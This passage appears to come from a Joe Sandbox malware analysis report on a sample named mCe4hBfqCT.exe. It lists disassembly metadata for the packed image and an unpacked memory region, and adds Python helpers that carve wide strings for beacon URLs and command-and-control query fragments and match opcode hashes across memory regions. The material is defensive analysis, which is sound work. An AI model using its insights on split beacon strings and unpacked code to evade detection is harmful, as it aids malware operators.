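            + "ios_base::failbit set".encode("utf-16-le") + b"\x00\x00"  # CRT string also listed in the report
            + noise)


# Printable ASCII stored as UTF-16LE (char byte followed by 0x00), 4+ chars, any alignment.
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def carve_wide_strings(blob: bytes) -> list[str]:
    """Return every UTF-16LE run of printable ASCII in the buffer, in buffer order."""
    return [m.group().decode("utf-16-le") for m in WIDE_RE.finditer(blob)]


URL_RE = re.compile(r"^https?://\S+$")
QUERY_FRAG_RE = re.compile(r"^[&?][A-Za-z0-9_]+=")   # '&cc=DE', '?sub=' style pieces


def network_indicators(strings: list[str]) -> dict[str, list[str]]:
    """Split carved strings into full URLs and loose query-string fragments."""
    return {
        "urls": [s for s in strings if URL_RE.match(s)],
        "query_fragments": [s for s in strings if QUERY_FRAG_RE.match(s)],
    }


def host_of(url: str) -> str:
    """Hostname part of a URL, for a block or alert list."""
    return re.sub(r"^https?://", "", url).split("/", 1)[0].split(":", 1)[0]


if __name__ == "__main__":
    found = carve_wide_strings(build_fake_dump())
    ind = network_indicators(found)
    for u in ind["urls"]:
        print("URL:", u, "-> host", host_of(u))
    for f in ind["query_fragments"]:
        print("query fragment:", f)
```

The regex deliberately ignores alignment: a wide string in a heap or stack dump can start at an odd offset, and the 13-byte gap in the constructed buffer exercises that case. Fragments like &cc=DE do not survive a URL-only filter, which is why the script reports them separately; the full beacon URL is only visible at runtime once the pieces are concatenated.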
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\mCe4hBfqCT.exe,00000104), ref: 0042F773
                                                  • _free.LIBCMT ref: 0042F83E
                                                  • _free.LIBCMT ref: 0042F848
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                  • API String ID: 2506810119-1342319500
                                                  • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                  • Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
                                                  • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                  • Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\mCe4hBfqCT.exe,00000104), ref: 0303F9DA
                                                  • _free.LIBCMT ref: 0303FAA5
                                                  • _free.LIBCMT ref: 0303FAAF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                  • API String ID: 2506810119-1342319500
                                                  • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                  • Instruction ID: 356f3ee380423a8d96e7ca6e4964aca92a65038e7e5488f2125150831c6cbfd5
                                                  • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                  • Instruction Fuzzy Hash: FA3183B5E06759EFDB21DF99DC80D9EBBFCEF8A710B1441A6E804DB211D6709A40CB50
                                                  APIs
                                                  • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 03033071
                                                    • Part of subcall function 03028AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 03028ADD
                                                  • SafeSQueue.LIBCONCRT ref: 0303308A
                                                  • Concurrency::location::_Assign.LIBCMT ref: 0303314A
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0303316B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03033179
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                  • String ID: 11@
                                                  • API String ID: 3496964030-1785270423
                                                  • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                  • Instruction ID: 3e9956d6795ba225c249b8364febd88bca47bd6cc30038942c3810373f74a123
                                                  • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                  • Instruction Fuzzy Hash: 0B21C2397016119FCF15EF69C8D0AADBBA9EF86710F098199DD468F252CB70E805CB91
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,030421E4), ref: 0303E220
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,030421E4), ref: 0303E25A
                                                  • RtlExitUserThread.NTDLL(00000000), ref: 0303E261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                  • String ID: 11@
                                                  • API String ID: 1079102050-1785270423
                                                  • Opcode ID: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                  • Instruction ID: e29a3a2b89e63746d83ebc57405c8d621b98ece2fd0d61ddf31e98d8402030d9
                                                  • Opcode Fuzzy Hash: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                  • Instruction Fuzzy Hash: CB113AB9646305ABEB04FB70DD0ABEE37A8AF87B00F140678F9006F1D1DBA59600C660
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,030421E4), ref: 0303E220
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,030421E4), ref: 0303E25A
                                                  • RtlExitUserThread.NTDLL(00000000), ref: 0303E261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                  • String ID: 11@
                                                  • API String ID: 1079102050-1785270423
                                                  • Opcode ID: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                  • Instruction ID: ebb52f0b4f71197ffc1ad593b104e4d03b409758803b5923ad2ff0b4a2790e21
                                                  • Opcode Fuzzy Hash: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                  • Instruction Fuzzy Hash: EE114CB9646305ABEB04FB70DD0ABEE37A8AF87B00F140678FA046F1D1DBB55600C660
                                                  APIs
                                                  • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID: 11@$f(@
                                                  • API String ID: 1452528299-1277599000
                                                  • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                  • Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
                                                  • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                  • Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
                                                  APIs
                                                  • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                    • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                    • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                  • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                  • String ID: 11@
                                                  • API String ID: 2684344702-1785270423
                                                  • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                  • Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
                                                  • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                  • Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
                                                  APIs
                                                  • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 03036194
                                                    • Part of subcall function 03035161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 0303517E
                                                    • Part of subcall function 03035161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 03035193
                                                  • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 030361C7
                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 030361F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                  • String ID: 11@
                                                  • API String ID: 2684344702-1785270423
                                                  • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                  • Instruction ID: 38aafed87f9b8bcfd2ed11c4c49a5f298f715aea0a21a0fb251cd8329520dc26
                                                  • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                  • Instruction Fuzzy Hash: 7C018479601219AFCF15DF58C4809AE77FEEFCA354B1800A5EC46AB301DA31EE0597A0
                                                  APIs
                                                  • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                    • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                    • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                  • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                  • String ID: 11@
                                                  • API String ID: 2524916244-1785270423
                                                  • Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                  • Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
                                                  • Opcode Fuzzy Hash: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                  • Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
                                                  APIs
                                                  • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 03021DC9
                                                    • Part of subcall function 03020CD8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 03020CEB
                                                    • Part of subcall function 03020CD8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 03020CF5
                                                  • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 03021DE2
                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 03021E28
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                  • String ID: 11@
                                                  • API String ID: 2524916244-1785270423
                                                  • Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                  • Instruction ID: 98ea0ed57572146c52ff3448560e9066000f565c6f554e182ac26ca3b111172b
                                                  • Opcode Fuzzy Hash: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                  • Instruction Fuzzy Hash: 4B018C7AA023348BDF19EB64C8947ADBBB6AFC4310F184495C9026B384CB75A905CB91
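The block above and the one before it repeat a pattern visible throughout this listing: a function in the PE-backed image at offset 00400000 and a function in the non-PE-backed region at offset 03010000 share an Opcode ID (here 2add4039..., earlier 32a00164...) but carry different Instruction IDs. I read that as the same instruction sequence with different operands, which is what a relocated copy of a function looks like, and it is how you would confirm from the metadata alone that the 0x03010000 region holds unpacked code from the main image. As an added example, not part of the Joe Sandbox report, the following Python parses an excerpt of this page's own metadata and lists the opcode hashes that recur across distinct memory regions. The excerpt is copied from blocks on this page; the parser and its helper names are my own.

```python
import re
from collections import defaultdict

# Excerpt copied from the disassembly metadata on this page (bullets kept, other fields dropped).
# Constructed as test input; the full report has many more blocks.
REPORT_EXCERPT = """\
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
• Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
• Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
• Instruction ID: 356f3ee380423a8d96e7ca6e4964aca92a65038e7e5488f2125150831c6cbfd5
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
• Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
• Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
• Instruction ID: 38aafed87f9b8bcfd2ed11c4c49a5f298f715aea0a21a0fb251cd8329520dc26
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
• Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
• Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
• Instruction ID: 98ea0ed57572146c52ff3448560e9066000f565c6f554e182ac26ca3b111172b
"""

OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
ID_RE = re.compile(r"(Opcode ID|Instruction ID):\s*([0-9a-f]{40,})")


def parse_blocks(text: str) -> list[dict]:
    """One record per function block: memory region, opcode hash, instruction hash."""
    records, region, opcode = [], None, None
    for line in text.splitlines():
        m = OFFSET_RE.search(line)
        if m:                                   # a 'Source File' line starts a new block
            region = (int(m.group(1), 16), m.group(2) == "true")
            opcode = None
            continue
        m = ID_RE.search(line)                  # 'Opcode Fuzzy Hash' lines do not match on purpose
        if not m or region is None:
            continue
        if m.group(1) == "Opcode ID":
            opcode = m.group(2)
        elif opcode is not None:                # Instruction ID follows its Opcode ID
            records.append({"base": region[0], "pe_backed": region[1],
                            "opcode_id": opcode, "instruction_id": m.group(2)})
            opcode = None
    return records


def relocated_copies(records: list[dict]) -> dict[str, list[int]]:
    """Opcode hashes seen in more than one region with differing instruction hashes:
    same opcodes, different operands, i.e. the same function at another base address."""
    by_opcode = defaultdict(list)
    for r in records:
        by_opcode[r["opcode_id"]].append(r)
    hits = {}
    for oid, rs in by_opcode.items():
        bases = {r["base"] for r in rs}
        insns = {r["instruction_id"] for r in rs}
        if len(bases) > 1 and len(insns) > 1:
            hits[oid] = sorted(bases)
    return hits


if __name__ == "__main__":
    for oid, bases in relocated_copies(parse_blocks(REPORT_EXCERPT)).items():
        print(oid[:16], "present at", ", ".join(f"0x{b:08X}" for b in bases))
```

Run against the whole listing, the ratio of matched to unmatched opcode hashes tells you how much of the 0x03010000 region is simply the main image relocated and how much is code that never existed in the on-disk PE; the latter is where to point the disassembler first. The first pair in the excerpt (3308642d... and 34465883...) is the same GetModuleFileNameW wrapper in both regions, but compiled differently, so it is correctly left out.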
                                                  APIs
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                  • String ID: 11@$pContext
                                                  • API String ID: 1687795959-1086721755
                                                  • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                  • Instruction ID: 9010ffe1b6885ba769d18c3576365b3581292a7ba769087c8389302fb8d97d4f
                                                  • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                  • Instruction Fuzzy Hash: B5F0593AB006159BCB04EB59DC45C5EF7A8AF85B64710007BFD01E3342CFB8EE058698
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,0304011C,00000000,?,030400BC,00000000,00457970,0000000C,03040213,00000000,00000002), ref: 0304018B
                                                  • GetProcAddress.KERNEL32(00000000,004496C4), ref: 0304019E
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0304011C,00000000,?,030400BC,00000000,00457970,0000000C,03040213,00000000,00000002), ref: 030401C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: 11@
                                                  • API String ID: 4061214504-1785270423
                                                  • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                  • Instruction ID: 1c95566848db1b322f8ecf9d4922fb8d014c21effab8100f3d96a6aa5880d024
                                                  • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                  • Instruction Fuzzy Hash: 77F0A934A01208FBDB10DF94DC49BAEFFF8EF05B12F1401B8F905A21A0CB749A40CA88
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0301C903
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                  • Instruction ID: 34322473756c0cc8ea7619f2d45932c022420b11178758972838e184582a9ea9
                                                  • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                  • Instruction Fuzzy Hash: 2DF02B73C413086BEB44EA54CC81BEF73D85B05215F04846AEE166A082E7E8DA19C7A5
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                  • String ID: f(@
                                                  • API String ID: 3213686812-2560262586
                                                  • Opcode ID: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                  • Instruction ID: 69bc41ef776010156a50f9e736d675acab369240ea0dcafc6817c09100241395
                                                  • Opcode Fuzzy Hash: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                  • Instruction Fuzzy Hash: 1FF0E260B8432639FA2037A2BD0BBAA16150F24B0DF96042BBE0A991C3DE9C9551416D
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog3_catchmake_shared
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3472968176-2084237596
                                                  • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                  • Instruction ID: c5e13afb70d03800ba201c8f27ea4f547f000a04bf221ec5d9b98c96abbe9713
                                                  • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                  • Instruction Fuzzy Hash: 16F0B878506318DFDB51EF64C44169DFB68AF86B04F498093F8445F324C77A9945CBA1
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                  Strings
                                                  Memory Dump Source
                                                  • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                    • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                  • __Getcoll.LIBCPMT ref: 00404EE9
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                  • String ID:
                                                  • API String ID: 1836011271-0
                                                  • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                  • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                  • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                  • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 030150F6
                                                    • Part of subcall function 0301BDD3: __EH_prolog3_GS.LIBCMT ref: 0301BDDA
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 03015141
                                                  • __Getcoll.LIBCPMT ref: 03015150
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 03015160
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                  • String ID:
                                                  • API String ID: 1836011271-0
                                                  • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                  • Instruction ID: dd355e7d24204b29dae2c31598d198d5fb2db017a56471dc1b5aeea1570987f3
                                                  • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                  • Instruction Fuzzy Hash: 96019A75C02308DFEB44EFA8C880BDDBBB0BF84310F408429D444AF280DBB89694CB91
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 03015BB2
                                                    • Part of subcall function 0301BDD3: __EH_prolog3_GS.LIBCMT ref: 0301BDDA
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 03015BFD
                                                  • __Getcoll.LIBCPMT ref: 03015C0C
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 03015C1C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                  • String ID:
                                                  • API String ID: 1836011271-0
                                                  • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                  • Instruction ID: 048ea5beccc372ff57db9ed53d3349d1ae49449eb11ef5cbc5e960e72a76ef1e
                                                  • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                  • Instruction Fuzzy Hash: 25018875842308DFEB04EFA4C880BDDBBB0BF88310F00842AD444AF280CBB89594CB90
                                                  APIs
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
